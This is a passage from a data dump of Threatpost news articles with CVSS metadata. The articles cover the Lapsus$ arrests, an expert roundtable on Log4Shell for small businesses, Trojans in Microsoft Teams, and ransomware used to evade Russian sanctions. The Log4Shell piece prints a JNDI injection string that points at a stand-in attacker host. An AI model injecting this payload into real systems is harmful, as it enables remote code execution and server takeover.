educational resources on programming and offensive security,\u201d he said.\n\n\u201cI speculated the group was young based on their modus operandi, or lack thereof, it was as if they were surprised by their success and were not sure what to do with it. In some of their follow up communications their language appeared more interested in the notoriety and [was] defensive of their capabilities and accomplishments than any financial motivation,\u201d he continued.\n\nOf course, when it comes to guessing what somebody\u2019s motivation might be for taking on the world\u2019s shiniest tech companies, et al., there\u2019s always that purported 300BTC income that Doxbin pointed to. Not too shabby a motivation, that, particularly when planted in the still-developing brain of a tot that\u2019s been put under glass during the pandemic.\n\n\u201cToday, teens have seen how much money is being made in criminal hacking, in some ways they are the new rockstars,\u201d Westin said. \u201cYou pair this with the fact kids have been couped up for three years often with nothing but the internet to entertain themselves and we shouldn\u2019t be surprised we have skilled hackers. The problem is that their brains are still developing and the line between fun and crime can get blurred, where it\u2019s common for kids to hack to gain notoriety amongst their peers, but this easily crosses over into decisions that can affect the rest of their lives.\u201d\n\nIt\u2019s too early to say whether this will be the end of Lapsus$, he said. \u201cit could still be a false flag, bad attribution, or even framing someone for the hacks. If it is this 16-year-old in England, it is likely we will see an end to the group\u2019s activity, unless one of their partners in cybercrime takes up the mantle.\u201d\n\nWhether Lapsus$ boils down to a criminal gang or a teenager from Oxford, what matters is that the \u201corganization\u201d clearly has the ability to infiltrate some of the world\u2019s largest organizations at a speed that makes these attacks impossible to prevent using traditional perimeter defense tools, said Darren Williams, founder and CEO of privacy/security/prevention firm BlackFog.\n\nWe can\u2019t stick all teenagers in suspended animation until their brains are fully formed, but we can take note of how these groups/individuals stick it to targeted organizations. In an email to Threatpost on Thursday, Williams noted that more than 84 percent of all attacks involve data exfiltration, exposing data on the Dark Web and/or public web sites.\n\n\u201cBy refocusing security efforts on anti-data exfiltration, organizations are able to mitigate extortion attempts, regulatory fines, reports and ultimately the loss of trust in the business,\u201d Williams suggested.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T21:23:30", "type": "threatpost", "title": "UK Cops Collar 7 Suspected Lapsus$ Gang Members", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T21:23:30", "id": "THREATPOST:8105FA1422BB4E02CD95C23CC7405E26", "href": "https://threatpost.com/uk-cops-collar-7-suspected-lapsus-gang-members/179098/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T20:32:17", "description": "News of the Log4Shell vulnerability is everywhere, with security experts variously calling the Apache log4j logging library bug a recipe for an \u201cinternet meltdown,\u201d as well as the \u201cworst cybersecurity bug of the year.\u201d Names like \u201cApple,\u201d \u201cTwitter\u201d and \u201cCloudflare\u201d are being bandied about as being vulnerable, but what does the issue mean for small- and medium-sized businesses?\n\nWe asked security experts to weigh in on the specific effects (and advice/remedies) for SMBs in a set of roundtable questions, aimed at demystifying the firehose of information around the headline-grabbing issue.\n\nIt may seem overwhelming for smaller companies. But our experts, from Anchore, Cybereason, Datto, ESET, HackerOne, Invicti Security, Lacework and Mitiga, have weighed in here with exclusive, practical advice and explanations specifically for SMBs dealing with Log4Shell.\n\n_\u201cWiz research shows that more than 89 percent of all environments have vulnerable log4j libraries. And in many of them, the dev teams are sure they have zero exposure \u2014 and are surprised to find out that some third-party component is actually built using Java.\u201d \u2014 Ami Luttwak, __co-founder and CTO at Wiz, which has seen its usage double as a result of Log4Shell (via email to Threatpo__st)._\n\n_**Questions answered (click to jump to the appropriate section):**_\n\n * What bad Log4Shell outcomes are possible for SMBs?\n * How is a real-world Log4Shell attack carried out?\n * How can SMBs prepare for Log4Shell without a dedicated security team?\n * What happens if an SMB uses an MSP?\n * What applications should SMBs worry about being attacked?\n * How can SMBs remediate a Log4Shell attack?\n * Final thoughts\n\n## Background on Log4Shell\n\nLog4Shell ([CVE-2021-44228](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>)) affects applications that rely on the log4j library to log data. Because that library is almost ubiquitous in Java applications, virtually any business that has a website is highly likely to be affected. With one line of malicious code, attackers are able to execute malware or commands on a target application and take over the server that houses it.\n\nFrom there, an attacker can carry out any number of further attacks.\n\n\u201cSmall businesses are at significant risk because plenty of the software they rely on may be vulnerable, and they do not have the resources to patch quickly enough,\u201d Ofer Maor, Mitiga CTO, told Threatpost.\n\nSMBs also tend to rely on third-party software suppliers and managed service providers (MSPs) for their technology infrastructure, which reduces cost and reduces the need for dedicated IT staff. However, this unfortunately puts SMBs at even worse risk, because they need to rely on their third-party vendors to patch and respond in many cases.\n\nThe bug was first disclosed as a zero-day vulnerability last week, but an emergency fix has been rolled out that now must be incorporated by the many developers who use log4j in their applications. The steps to address Log4Shell for SMBs thus include identifying potentially affected applications (including those provided by MSPs), confirming the vulnerability\u2019s impact within them, and applying or confirming updates as soon as possible. SMBs will also need to determine whether they\u2019re already compromised and remediate the issue if so.\n\nAll of this should take priority since [a slew of attacks is imminent](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), thanks to an exploit becoming publicly available online, researchers noted.\n\n\u201cNumerous attack groups are already [actively exploiting](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) this vulnerability, mostly through automated scripts,\u201d Maor warned. \u201cThis means we expect to see this being exploited in masses, hitting tens of thousands or even more targets.\u201d\n\n## What Bad Log4Shell Outcomes Are Possible for SMBs?\n\n**Ofer Maor, Mitiga CTO:** One of the concerns is that a lot of these attacks now will focus on getting initial access only and establishing persistence (that is, installing something that will allow the attacker to have access to their systems later, even after the vulnerability has been fixed).\n\n**Marc-\u00c9tienne L\u00e9veill\u00e9, malware researcher for ESET:** SMBs providing online services may expose their system to malware and data exfiltration if their systems use the log4j software to log events. The risk is quite high, given the exploit is available online and relatively easy to trigger. Once into the network, cybercriminals could pivot to gain access to additional resources.\n\n**Josh Bressers, vice president of security at Anchore:** This vulnerability allows attackers to run the code of their choosing, such as a cryptominer, a backdoor or data-stealing malware, for example. One of the challenges for a vulnerability like this is the attacker landscape is changing rapidly. So far, most of the attacks seem to be using compute resources to mine cryptocurrency, but these attacks are changing and evolving each hour. It is expected that the attacks will gain in sophistication over the coming days and weeks.\n\n**Mark Nunnikhoven, distinguished cloud strategist at Lacework:** Unfortunately\u2026an attacker can take over your system or steal your data quite easily using this vulnerability.\n\n**Pieter Ockers, senior director of technical services at HackerOne: **In a more devastating case, criminals that gain initial access to the victim\u2019s environment could auction that access off to crews that specialize in executing ransomware attacks. SMBs should be hyper-aware of any of their software vendors/MSPs that use Apache log4j in case they are affected by a breach; I suspect we might hear of some ransomware attacks soon stemming from this vulnerability.\n\n## How Is a Real-World Log4Shell Attack Carried Out?\n\n**Cybereason CTO Yonatan Striem-Amit**: The most prevalent attack scenarios we\u2019ve seen are abusing things like the user agent or things like a log-in screen. If an application has a log-in page where a user is asked to put his username and password (and a lot of them do), an attacker could just supply the malicious string within that user field and get code execution on that server. After that he essentially controls logins, and therefore can start doing whatever he wants on that server, including, of course, eavesdropping into every other user who\u2019s logging in to the environment with their password.\n\n**Adam Goodman, vice president of product management at Invicti Security: **This attack is astonishingly easy to execute. This is because it may not require authentication to execute, nor would it require penetrating multiple application and/or networking layers to begin the exploit. It\u2019s simply a text string sent to any places that will be logged. And finding such a place is very easy \u2013 it can be a simple header, or a simple text field or error condition sent to a log file.\n\nTo exploit Log4Shell, the attacker may use any user input subsequently logged by the log4j framework. For example, in the case of a web application, it may be any text entry field or HTTP header such as User-Agent. Server logging is often set to log headers as well as form data.\n\nThe attacker only needs to include the following string in the logged user input:\n\n${jndi:ldap://attacker.com/executeme}\n\nWhere attacker.com is a server controlled by the attacker and executeme is the Java class to be executed on the victim server. And this is just one of many ways to exploit this vulnerability.\n\n**Lacework\u2019s Nunnikhoven: **\u201cA real world-attack can be as simple as the attack sending a specifically crafted web request to a vulnerable server. When the server processes that request, the attacker then has access to the server. The Lacework Labs team has documented this attack and some other technical aspects of attacks we\u2019ve seen in[ this blog post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>).\u201d\n\n**Anchore\u2019s Bressers: **Attackers send requests to vulnerable applications, this triggers the vulnerability. The application then downloads a cryptocurrency mining application, in one scenario, and runs it on the compromised system. The cryptomining application then consumes large amounts of victim\u2019s processing power while the attacker claims the cryptomining rewards.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/14151922/log4j-e1639513188979.png>)\n\nTrend Micro published this attack-scenario flow on Tuesday (https://www.zerodayinitiative.com/blog/2021/12/14/the-december-2021-security-update-review).\n\n## How Can SMBs Address Log4Shell without a Dedicated Security Team?\n\n**HackerOne\u2019s Ockers: **These kinds of wide sweeping cyberattacks will always be a bigger challenge for those that lack a dedicated security team. If only one or two individuals in IT are working to monitor security, it\u2019s even more important you\u2019re prepared and have already taken stock of the software you\u2019re using and your vendor\u2019s software. Once you gain that visibility, I recommend patching any instances you find of log4j and updating the software to version 2.15.0 in your own software. I\u2019d also confirm any vendors\u2019 exposure and incident management around log4j patching and response.\n\n_According to __[Microsoft\u2019s recent blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>)__, the log4j 2 library is included in widely deployed Apache products including Struts 2, Solr, Druid, Flink and Swift. SMBs that have built applications with these products should conduct a code audit to determine if the vulnerable version of log4j is in use._\n\n**Mitiga\u2019s Maor:** SMBs should set up an immediate task force to map all affected homegrown systems and patch them, while allowing IT to map all external systems and communicate with the censored systems.\n\n**Anchore\u2019s Bressers: **This vulnerability is going to be especially challenging for small and medium business users without a dedicated security team. Ideally software vendors are being proactive in their investigations and updates and are contacting affected customers, but this is not always the case.\n\nDepending on the level of technical acumen an organization has, there are steps that can be taken to detect and resolve the issue themselves. There are various open-source tools that exist to help detect this vulnerability on systems such as [Syft and Grype](<https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html>). CISA has [released guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) regarding this vulnerability, including steps a business can take.\n\n**Lacework\u2019s Nunnikhoven: **\u201cWhile IT knowledge is required, the basic steps don\u2019t require a security team. IT teams should be trying to find systems that use log4j in their environment and then apply one of the techniques the fantastic team of volunteers with the log4j project have published or the recommended guidance from that system\u2019s vendors. This is a lot of work but it\u2019s necessary to reduce the risk to your business.\n\n_The log4j team\u2019s resource is __[available here](<https://logging.apache.org/log4j/2.x/security.html>), in the mitigation section under the \u201cFixed in Log4j 2.15.0\u201d heading._ _Many organizations have also published free tools to help identify vulnerable applications, [like this one](<https://about.sourcegraph.com/blog/log4j-log4shell-0-day/>), [this one](<https://log4j-tester.trendmicro.com/>) or [this one](<https://github.com/hillu/local-log4j-vuln-scanner>)._\n\n**Invicti\u2019s Adam Goodman: **It\u2019s a nightmare of a problem if you have a surplus of Java applications deployed everywhere, not just on the primary website. Organizations should immediately determine where and how they directly or indirectly use this library and then take steps to mitigate the vulnerability by either upgrading the library or modifying Java system properties to disable the vulnerable functionality.\n\nAim to ensure that all applications have limited outbound internet connectivity, and use Ansible scripts or adequate security tools to scan _en masse_ for the vulnerability before forcibly patching it. It\u2019s crucial to use security tools that target all of the applications they can find so that organizations have a more accurate window into their security posture.\n\nOrganizations that lack sufficient budget to invest in discovery tools should make a list of Java applications which they add to continually, and check them off, while prioritizing apps that present the most risk if exploited.\n\n## What Happens if an SMB Uses an MSP?\n\n**Anchore\u2019s Bressers: **I would expect an MSP to take the lead on this issue for their customers. An MSP should be monitoring their infrastructure for indicators of compromise, applying workarounds when possible, and updating the managed applications as vendor updates become available. Any business using MSP services should reach out to their provider and request a status update on the Log4Shell.\n\n**Ryan Weeks, CISO at Datto:** \u201cCyber-threats are always prevalent. Especially for small to medium-sized businesses (SMBs) \u2013 [78 percent](<https://www.datto.com/resources/dattos-2020-global-state-of-the-channel-ransomware-report>) of MSPs reported attacks against their client SMBs in the last two years alone. MSPs have a responsibility to diligently check for vulnerabilities and arm their customers with the tools to combat them. It\u2019s not enough to simply install routine software updates. SMBs need to ensure their partners proactively push out security updates for any affected products, and continually monitor for potential exploits.\n\n**Invicti\u2019s Adam Goodman: **This is an issue front-and-center in the security community and if an organization is using an MSP, it\u2019s highly likely that MSP is actively working on this. Confirm that a ticket and incident is open for this vulnerability, and ask the MSP for a list of managed applications that are under remediation. It\u2019s vital to review that list of apps for anything that\u2019s missing, including any back-office or forgotten tools in the mix. Ensure the MSP has visibility into the attack surface so that you both can better handle necessary containment steps moving forward.\n\n**Lacework\u2019s Nunnikhoven: **A managed service provider can help update and fix the systems they manage. A managed security service provider can help detect and stop attacks aimed at this issue, and help investigate any attacks that may have already taken place. The first step in both cases is speaking with your MSP/MSSP to understand the steps they are taking to help protect their customers.\n\n## What Applications Should SMBs Worry About?\n\n**Mitiga\u2019s Maor:** Impact can vary significantly as many custom-developed and off-the-shelf products are impacted. Many adversaries are using the vulnerability as part of mass-scanning efforts to identify vulnerable systems. Likewise, some known malware strains have already incorporated exploitation of this vulnerability into their spreading mechanisms. Any Java application might be affected.\n\n**Invicti\u2019s Adam Goodman: **SMBs should address worries and concerns based on business risk. Internet-facing apps should receive immediate priority, followed by applications that are critical to the software supply chain or back-office and financial applications. There is also an excellent effort from the security community to compile all affected technologies, [it can be found here](<https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592>).\u201d\n\n**ESET\u2019s L\u00e9veill\u00e9: **As a first step, SMBs should ask questions of the organization providing their internet-facing services such as their website. Then they should see if any of their applications use log4j to generate logs. Java applications and webservices would be the first to look at because log4j is a Java library.\n\n**Cybereason\u2019s Striem-Amit:** The world of Java and open source has so many dependencies, where a company might use one product, but it actually carries with it a dozen other libraries. So log4j could be present even though a company might not necessarily even be aware or \u2026 done it directly. So the scanning and the analysis is severely complex. And you have to go in each one of your servers and see, are we using log4j either directly or indirectly in that environment.\n\n## How Can SMBs Remediate a Successful Log4Shell Attack?\n\n**Mitiga\u2019s Maor:** Thankfully, there\u2019s a lot that can be done to harden environments. For customers with internally developed applications, limiting outbound internet connections from servers to only whitelisted hosts is a great step, if challenging to implement. Likewise, a variety of cybersecurity companies have listed steps that can be taken to harden vulnerable versions of log4j if upgrades can\u2019t be performed readily. Similarly, exploitation of this vulnerability and many others can be caught using typical compromise assessment techniques. It pays to threat hunt! Remediation is no different than recovering from any other type of RCE vulnerability.\n\n**Lacework\u2019s Nunnikhoven: **\u201cRemediation of this issue will depend on where you find log4j. If it\u2019s in something you\u2019ve written, you can update the library or turn off the vulnerable feature. For commercial software and services, you\u2019re reliant on the vendor to resolve the issue. While that work is ongoing, monitoring your network to attack attempts is reasonably straightforward\u2026if you have the security controls in place.\n\nLacework Labs has published[ a detailed technical post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>) on some of the attack techniques currently in use. Expect more variants as cybercriminals develop more techniques to avoid various security controls and other mitigation.\n\nIn situations like this it\u2019s important to understand that until the root cause has been resolved (log4j updated or the feature in question turned off), attackers will continue to work to evade any mitigations that defenders put in place to stop them.\n\n**Anchore\u2019s Bressers: **An organization without an incident-management team on staff should reach out to an incident-management consulting group. There are a number of important steps that should happen when investigating any cybersecurity attack, successful or not, that can require preserving evidence, recovering data, and protecting employees and users. This is a serious vulnerability with serious consequences. It\u2019s one of the worst we have seen in recent history because of its ease of exploitability, far-reaching impacts and powerful nature.\n\n## Final Thoughts\n\n**Datto\u2019s Weeks:** Scenarios such as the log4j vulnerability underscore the importance of proactivity in security. While many are now scrambling to address the vulnerability with patches, it\u2019s equally more important to plan for subsequent attacks. Fortunately, there are solutions that can apply known workarounds for vulnerable instances.\n\n**HackerOne\u2019s Ockers: **As a best practice, I recommend all businesses have a clear understanding of the software used within their own systems. Even more important for SMBs in this instance \u2014 businesses should also have a clear understanding of the licensing agreements and security policies of any software vendors or service providers. This level of visibility lets security and IT teams quickly understand where they\u2019re at risk if, and when, something like this is exploited.\n\n**ESET\u2019s L\u00e9veill\u00e9: **SMBs should verify if there were any successful attempts to exploit the vulnerability by looking at their logs.\n\n**HackerOne\u2019s Ockers: **SMBs and larger organizations alike will be affected. As we\u2019re seeing, exploitation will continue to be widespread \u2013 this means it\u2019s particularly important that SMBs check if vendors are still using the vulnerable version of log4j to process user-controlled or otherwise untrusted data. And, if so, SMBs should also ask vendors if their data is stored or processed in the same exposed environment.\n\n**Cybereason\u2019s Striem-Amit:** I think at the end of the day, really prioritize the most internet-facing environments, and rely on your service providers as much as they can to assist you with other patching. You\u2019re welcome to use [our vaccine](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) to buy time. It does work remarkably well to make sure that, between now and when you actually end up patching the server, you\u2019re kind of secure.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, features security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T17:54:47", "type": "threatpost", "title": "What the Log4Shell Bug Means for SMBs: Experts Weigh In", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T17:54:47", "id": "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "href": "https://threatpost.com/log4shell-bug-smbs-experts/177021/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:44", "description": "Threat actors are targeting Microsoft Teams users by planting malicious documents in chat threads that execute Trojans that ultimately can take over end-user machines, researchers have found.\n\nIn January, researchers at Avanan, a Check Point Company, began tracking the campaign, which drops malicious executable files in Teams conversations that, when clicked on, eventually take over the user\u2019s computer, according to [a report](<https://www.avanan.com/blog/hackers-attach-malicious-.exe-files-to-teams-conversations>) published Thursday.\n\n\u201cUsing an executable file, or a file that contains instructions for the system to execute, hackers can install DLL files and allow the program to self-administer and take control over the computer,\u201d cybersecurity researcher and analyst at Avanan Jeremy Fuchs wrote in a report. \u201cBy attaching the file to a Teams attack, hackers have found a new way to easily target millions of users.\u201d\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\nCybercriminals long have targeted Microsoft\u2019s ubiquitous document-creation and sharing suite \u2013 the legacy Office and its cloud-based version, [Office 365](<https://threatpost.com/tiny-font-size-email-filters-bec-phishing/176198/>) \u2013 with attacks against individual apps in the suite such as [PowerPoint](<https://threatpost.com/powerpoint-abused-take-over-computers/178182/>) as well as [business email compromise](<https://threatpost.com/microsoft-365-bec-innovation/163508/>) and other scams.\n\nNow Microsoft Teams \u2013 a business communication and collaboration suite \u2013 is emerging as an [increasingly popular attack surface](<https://threatpost.com/microsoft-teams-phishing-office-365/160458/>) for cybercriminals, Fuchs said.\n\nThis interest could be attributed to its surge in use over the COVID-19 pandemic, as many organization\u2019s employees working remotely relied on the app to collaborate. Indeed, the number of daily active users of Teams [nearly doubled](<blank>) over the past year, increasing from 75 million users in April 2020 to 145 million as of the second quarter of 2021, according to Statista.\n\nThe latest campaign against Teams demonstrates an increased understanding of the collaboration app that will allow attacks against it to increase in both sophistication and volume, Fuchs noted. \u201cAs Teams usage continues to increase, Avanan expects a significant increase in these sorts of attacks,\u201d he wrote.\n\n## **Taking on Teams**** **\n\nIn order to plant malicious documents in Teams, researchers first have to get access to the application, Fuchs noted. This is possible in a number of ways, typically involving an initial [email compromise](<https://threatpost.com/microsoft-teams-tabs-bec/166909/>) through phishing to gain credentials or other access to a network, he said.\n\n\u201cThey can compromise a partner organization and listen in on inter-organizational chats,\u201d Fuchs wrote. \u201cThey can compromise an email address and use that to access Teams. They can steal Microsoft 365 credentials, giving them carte blanche access to Teams and the rest of the Office suite.\u201d\n\nOnce an attacker gains access to Teams, it\u2019s fairly easy to navigate and slip past any security protections, he noted. This is because \u201cdefault Teams protections are lacking, as scanning for malicious links and files is limited,\u201d and \u201cmany email security solutions do not offer robust protection for Teams,\u201d Fuchs wrote.\n\nAnother reason Teams is easy for hackers to compromise is that end users inherently trust the platform, sharing sensitive and even confidential data with abandon while using it, he said.\n\n\u201cFor example, an Avanan analysis of hospitals that use Teams found that doctors share patient medical information practically with no limits on the Teams platform,\u201d Fuchs wrote. \u201cMedical staff generally know the security rules and risk of sharing information via email, but ignore those when it comes to Teams. In their mind, everything can be sent on Teams.\u201d\n\nFurther, nearly every Teams user can invite people from other departments or other companies to collaborate via the platform, and there is often \u201cminimal oversight\u201d over these requests because of the trust people have, he added.\n\n## **Specific Attack Vector**\n\nIn the attack vector Avanan researchers observed, attackers first access Teams through one of the aforementioned ways, such as a phishing email that spoofs a user, or through a lateral attack on the network.\n\nThen, the threat actor attaches a .exe file to a chat \u2013 called \u201cUser Centric\u201d \u2013 that is actually a trojan. To the end user, it looks legitimate, because it appears to be coming from a trusted user.\n\n\u201cWhen someone attaches a file to a Teams chat, particularly with the innocuous-sounding file name of \u2018User Centric,\u2019 many users won\u2019t think twice and will click on it,\u201d Fuchs wrote.\n\nIf that happens, the executable will then install DLL files that install malware as a Windows program and create shortcut links to self-administer on the victim\u2019s machine, he said. The ultimate goal of the malware is to take over control of the machine and perform other nefarious activities.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T14:11:48", "type": "threatpost", "title": "Microsoft Teams Targeted With Takeover Trojans", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T14:11:48", "id": "THREATPOST:6675B640474BF8A8A3D049DB0266A118", "href": "https://threatpost.com/microsoft-teams-targeted-takeover-trojans/178497/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T15:23:28", "description": "Russia may ramp up ransomware attacks against the United States as a way to ease the financial hurt it\u2019s under due to sanctions, U.S. federal authorities are warning. Those sanctions have been levied against the nation and Vladimir Putin\u2019s government due to its invasion of Ukraine.\n\nThe Financial Crimes Enforcement Network (FinCEN) issued a FinCEN Alert [(PDF)](<https://www.fincen.gov/sites/default/files/2022-03/FinCEN%20Alert%20Russian%20Sanctions%20Evasion%20FINAL%20508.pdf>) on Wednesday advising all financial institutions to remain vigilant against potential efforts to evade the expansive sanctions and other U.S.-imposed restrictions related to the current conflict. One way this may be done is to move cryptocurrency funds through ransomware payments collected after Russian state-sponsored actors carry out cyberattacks.\n\n\u201cIn the face of mounting economic pressure on Russia, it is vitally important for U.S. financial institutions to be vigilant about potential Russian sanctions evasion, including by both state actors and oligarchs,\u201d said FinCEN Acting Director Him Das [in a press statement.](<https://www.fincen.gov/news/news-releases/fincen-provides-financial-institutions-red-flags-potential-russian-sanctions>)\n\nFinancial actions taken against Russia by the U.S. Department of the Treasury\u2019s Office of Foreign Assets Control (OFAC) since the nation\u2019s invasion of Ukraine last month are numerous. They include:\n\n * Sanctions against persons who have financial operations in the Russian Federation, including Putin and Russia\u2019s Minister of Foreign Affairs Sergei Lavrov\n * Prohibitions on correspondent or payable-through account and payment processing and blocking of certain Russian financial institutions\n * Prohibitions related to new debt and equity for certain Russian entities\n * A prohibition on transactions involving certain Russian government entities, including the Central Bank of the Russian Federation.\n\nFinCEN now is urging financial institutions \u2013 including those with visibility into cryptocurrency or convertible virtual currency (CVC) flows, such as CVC exchangers and administrators \u2013 to identify and report suspicious activity associated with potential sanctions evasion quickly and conduct an investigation where appropriate.\n\nSo far FinCEN has not seen widespread evasion of sanctions using methods such as cryptocurrency, Das noted. However, \u201cprompt reporting of suspicious activity\u201d can ensure this remains the case to support U.S. efforts and interest in supporting Ukraine.\n\n## **Ramp-Up in Cyber-Attacks **\n\nIndeed, Russia state-sponsored actors already have ramped up cyber-attacks since the beginning of the conflict in the Ukraine; thus, an increase in ransomware activity is not an entirely unlikely prospect.\n\nResearchers at Google\u2019s Threat Analysis Group (TAG) [reported earlier this week](<https://threatpost.com/russian-apts-phishing-ukraine-google/178819/>) that they had observed advanced persistent threat (APT) groups affiliated with or backing Vladimir Putin\u2019s government stepping up phishing attacks against Ukrainian and European targets, as well as distributed denial-of-service (DDoS) attacks against key government and service-oriented Ukrainian websites.\n\nBecause it is not regulated by typical financial currency laws in the United States, cryptocurrency has become a method of choice for cybercriminals to conduct transactions \u2013 including receiving payouts after ransomware attacks. For this reason, it also could be used by Russia to get around U.S. sanctions, noted one security professional.\n\n\u201cFor the tech savvy or oligarch with a need to move money, they can hire the talent to move the transactions,\u201d Rosa Smothers, senior vice president of cyber operations at security firm [KnowBe4](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUavSzE-2FiwjSkZ-2BMZMLjTD68bBzltWsjOj4iPYBhQEjDkOYxa_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8IRiPIGKWMahkivu0WTh5PX5dG77IJVWKxIQtQJVv-2BIYuYvpXdvb7-2BNsZCUHkZXL7ec2QLTY2-2FTBe03G8iVYPixd8Bov5GgH6DAKHGUqexQ-2B0nAYVFKMqkBKYw8YYPqfJNrlxOwOTBqCCKReqy6Kmv5Y9-2FNHt4zLkJVstDtTRBPXtmuX1dxVZT3q5fhWHsXeqv-2Fv1cJIX-2Fjlb-2FKnRhdADS-2BgZa5auC32i8V3U0ThbubhxXsqpIt03Hz1cjPy4L3tEOEdvhmz3jLvNd846SsHu-2Fk-3D>) and a former CIA cyber threat analyst and technical intelligence officer, observed in an email to Threatpost.\n\nHowever, while cryptocurrency does provide privacy for storage and process transactions, \u201cthe transparency provided by blockchain could make the movement of large amounts of cryptocurrency detectable by law enforcement,\u201d she noted, citing how the Department of Justice was able to [seize millions of dollars in Bitcoin](<https://threatpost.com/fbi-claws-back-millions-darksides-ransom/166705/>) that Colonial Pipeline paid to the DarkSide group after [a highly disruptive ransomware attack](<https://threatpost.com/pipeline-crippled-ransomware/165963/>) last May.\n\nIndeed, another security professional expressed doubt that Russia could use ransomware payments or any other type of cryptocurrency transactions to evade U.S. sanctions \u201cat any meaningful scale.\u201d\n\n\u201cThe magnitude of the recent sanction reaches into the 